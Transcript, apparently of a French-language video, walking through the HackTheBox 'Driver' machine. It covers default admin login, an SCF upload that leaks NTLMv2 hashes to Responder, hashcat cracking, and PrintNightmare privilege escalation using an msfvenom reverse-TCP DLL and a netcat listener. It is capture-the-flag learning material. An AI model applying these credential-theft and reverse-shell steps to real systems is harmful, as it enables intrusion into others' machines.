Hey, what's up les hackers, ici Mike Lizotte pour une nouvelle vidéo. Aujourd'hui, je fais du hack de box. Je fais la machine Driver, qui est une machine Windows, difficulté Easy. Cette vidéo-là, ça va être une walkthrough parce que je l'ai déjà faite. Puis pour une machine Easy, c'était tout qu'un challenge, ça m'a pris beaucoup d'heures. J'ai malheureusement pas pu faire de vidéo. Donc cette vidéo va servir à documenter les techniques que j'utilisais pour l'exploiter. On est connecté au VPN et la machine est startée. Donc, on va commencer avec un scan Nmap. Donc, comme d'habitude, pendant le scan, je vais mettre la vidéo sur pause, puis on se revoit tout de suite après. Alright, donc le scan est terminé. On va regarder ça. Donc, sur le port 80, on a Microsoft IIS, qui est un service HTTP, donc un site web. On a le RPC, on a le SMB, puis ça, qui était le Remote Management. Donc, première étape, c'est d'aller voir le site web. Première chose qui arrive quand on y va, c'est qu'on se fait prompt pour des login credentials. Mon premier réflexe, ça a été admin. Guess what? Ça marche. Donc là, on arrive sur un site qui est une espèce de update center pour des firmware d'imprimantes. Il y avait une section intéressante ici, parce qu'on pouvait uploader un fichier. Puis dans le fond, on upload ça dans un file share. Le testing team, il va review manually. Donc ça m'a pris une couple d'heures pour trouver ça, jusqu'à temps que je tombe sur un merveilleux site. Force hash with file. Fait que dans le fond, j'en ai essayé plusieurs. Puis ce qui marchait, c'était l'exécution via un fichier SCF. Donc, quand on upload un fichier SCF, puis le user se déplace manuellement dans ce dossier-là, ça va l'exécuter automatiquement, puis ça va nous envoyer ses credentials. Vraiment le fun. Donc, la première étape, c'était d'utiliser Responder. Responder. On lui donne l'interface. Dans ce cas-ci, c'est l'interface du VPN. Là, j'ai un message d'erreur qui a déjà quelque chose sur le port 445. Donc, on va faire sudo netstat. Puis, on a ça ici. Donc, sudo kill. Là, je vais juste, pour être safe, sudo rm. Hop. Et on restart responder. Il n'y a pas de message d'erreur. Excellent. Donc, prochaine étape, c'est de créer notre fichier. Il va ressembler à ça ici. Donc, nano f.scf shell command égale 2 icon file equals. On va mettre notre adresse, notre share. Tools nc.go taskbar command toggle desktop. On enregistre. Puis là, si tout est beau, ce qu'on peut faire, c'est uploader notre fichier. Avant de faire submit, je vais me. Non, j'ai pas besoin, on a déjà responder. On laisse responder, on fait submit. Le user s'en va dans le dossier et le fichier s'exécute. Il nous envoie son domaine, son username avec son password hash. Donc ici, la prochaine étape, c'était de cracker le password hash. Donc, on va se faire un fichier nano hash.
Ici, on peut faire hash4. Hash. On va lui donner une word list. Puis NTLM V2, c'est 5600. Fait que ça y va. Ça devrait pas être long avec une 1080 Ti. Il a fini de craquer. Et le mot de passe, on l'a direct ici. Little Tony. Excellent. Donc, on a un user et un password. Après ça, j'ai réussi à me connecter sur la machine avec Winevil ARM. Puis j'ai rien trouvé d'intéressant. J'ai cherché pendant des heures et des heures. Jusqu'à temps que je me rende compte que il n'y a pas longtemps, il y a un exploit qui est sorti qui s'appelle Printer Nightmare. Puis, ben, on a un gros indice. C'est quoi l'exploit ici? Donc, je l'ai essayé et ça a marché. On va aller chercher. Printer Nightmare. GitHub. En gros, ce que ça fait, c'est il y a une vulnérabilité qui existe avec une bypass d'autorisation en utilisant le spoolsv.exe qui est le Print Spooler Service. Ça permet à un utilisateur authentifié d'installer des drivers d'imprimante avec le RPC dans une remote location. Donc, nous, ce qu'on peut faire, c'est créer une payload ici pour obtenir les privileges système. Fait qu'on va essayer ça. Donc, la première étape, c'était de créer un user, un fake user pour notre service SMB. Je vais juste mettre des sudo ici. Ensuite de ça, il faut modifier notre fichier configuration de Samba. Pour faire ça, on va commencer par faire un backup du fichier original avec sudo mv etc. samba smb.conf. On va le mover à smb.conf.back. Puis, on va se faire un nouveau fichier de config avant de redémarrer le service Samba. smb.conf. On met ça ici. Prochaine étape est de restarter le service Samba. mctl restart smb2. Là, si je fais sudo system ctl status smb2, on voit que le service est actif. Tout est beau, pas de message d'erreur. Ensuite, ce que je vais faire, c'est cloner le guide de l'exploit. Git clone. cd print nightmare. On est là. Donc, on serait prêt à faire l'exploit. Il va juste me manquer une étape, c'est de créer un payload en DLL. MSF Venom. x64. Windows. x64. Shell. Reverse. TCP. lhost égale. On va mettre notre IP. lport égale 4444. On fait ça format DLL. Output. On va appeler ça file.dll. Ça devrait marcher. ls. Parfait. Notre payload est fait. On va déplacer ça dans le TMP. Maintenant, tout devrait être beau. Donc, on va se faire un listener nc-nlvp 4444. Ensuite, Python 3 CVE. Ici, on donne
le domaine qui est driver. Tony. Little Tony. Un commercial. Son IP. Ensuite, on lui donne notre share entre single quote comme ça. /smb/file.dll. Donc, à partir d'ici, il ne reste plus qu'à espérer que notre payload fonctionne. Si tout fonctionne comme prévu, boum! On reçoit un shell. Who am I? On est NT Authority System. Donc, on a le root sur une machine Windows. Alright, donc c'est ce qui conclut cette vidéo. J'espère que vous avez appris quelque chose. Dans mon cas, j'ai appris plein de choses. Puis j'ai trouvé la machine super intéressante. Mais Windows, c'est toujours un bon défi. Puis ça m'a permis de mettre des trucs en pratique. Donc, merci pour votre écoute. On se voit la prochaine fois.